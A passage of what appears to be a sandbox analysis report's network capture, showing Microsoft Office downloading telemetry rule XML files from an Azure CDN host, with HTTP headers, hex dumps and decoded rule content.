20 3c 2f 43 3e 0d 0a
                  Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                  2024-10-23 04:48:00 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                  Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                  2024-10-23 04:48:00 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                  Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                  2024-10-23 04:48:00 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                  Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                  2024-10-23 04:48:00 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                  Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                  Session IDSource IPSource PortDestination IPDestination Port
                  9192.168.2.44975813.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:01 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 2160
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                  ETag: "0x8DC582BA3B95D81"
                  x-ms-request-id: 1cf92a68-e01e-000c-57f4-248e36000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-r197bdfb6b4tq6ld2w31u8wmcc0000000m30000000005npa
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  10192.168.2.44975513.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:01 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC584INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 2980
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                  ETag: "0x8DC582BA80D96A1"
                  x-ms-request-id: 23ba7a24-801e-0015-5af3-24f97f000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-r197bdfb6b4ld6jca8vdwzkams000000073g000000001qxg
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                  Session IDSource IPSource PortDestination IPDestination Port
                  11192.168.2.44975613.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:01 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC563INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 3788
                  Connection: close
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Vary: Accept-Encoding
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                  ETag: "0x8DC582BAC2126A6"
                  x-ms-request-id: 331d1c77-401e-0029-354e-229b43000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-16849878b787sbpl0sv29sm89s00000005tg00000000b6ag
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                  Session IDSource IPSource PortDestination IPDestination Port
                  12192.168.2.44975713.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:01 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 450
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                  ETag: "0x8DC582BD4C869AE"
                  x-ms-request-id: 52fc638d-b01e-0070-36c5-201cc0000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-16849878b784cpcc2dr9ch74ng00000005t000000000cgmn
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                  Session IDSource IPSource PortDestination IPDestination Port
                  13192.168.2.44975913.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:01 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 408
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                  ETag: "0x8DC582BB56D3AFB"
                  x-ms-request-id: 31a53d7e-801e-00a3-74f7-217cfb000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-16849878b784cpcc2dr9ch74ng00000005q000000000qsm2
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                  Session IDSource IPSource PortDestination IPDestination Port
                  14192.168.2.44976013.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:02 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 474
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                  ETag: "0x8DC582B9964B277"
                  x-ms-request-id: 734838af-101e-0065-4be5-214088000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-16849878b7842t5ke0k7mzbt3c00000005gg00000000f4x9
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  15192.168.2.44976213.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:02 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 471
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                  ETag: "0x8DC582BB10C598B"
                  x-ms-request-id: 9c258c29-601e-003e-66f5-243248000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-r197bdfb6b4kkrkjmxpfy2et100000000m7g000000004u1s
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  X-Cache-Info: L1_T2
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                  Session IDSource IPSource PortDestination IPDestination Port
                  16192.168.2.44976313.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:02 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC470INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 632
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                  ETag: "0x8DC582BB6E3779E"
                  x-ms-request-id: bd9aacda-801e-0078-081b-24bac6000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-15b8d89586fcvr6p5956n5d0rc00000002r000000000fcxb
                  x-fd-int-roxy-purgeid: 0
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                  Session IDSource IPSource PortDestination IPDestination Port
                  17192.168.2.44976113.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:02 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                  Connection: Keep-Alive
                  Accept-Encoding: gzip
                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                  Host: otelrules.azureedge.net
                  2024-10-23 04:48:02 UTC491INHTTP/1.1 200 OK
                  Date: Wed, 23 Oct 2024 04:48:02 GMT
                  Content-Type: text/xml
                  Content-Length: 415
                  Connection: close
                  Cache-Control: public, max-age=604800, immutable
                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                  ETag: "0x8DC582B9F6F3512"
                  x-ms-request-id: 22602994-801e-00a0-73ef-242196000000
                  x-ms-version: 2018-03-28
                  x-azure-ref: 20241023T044802Z-15b8d89586f2hk2885zk3a4enc0000000c9g000000004g4x
                  x-fd-int-roxy-purgeid: 0
                  X-Cache-Info: L1_T2
                  X-Cache: TCP_HIT
                  Accept-Ranges: bytes
                  2024-10-23 04:48:02 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                  Session IDSource IPSource PortDestination IPDestination Port
                  18192.168.2.44976413.107.246.60443
                  TimestampBytes transferredDirectionData
                  2024-10-23 04:48:02 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
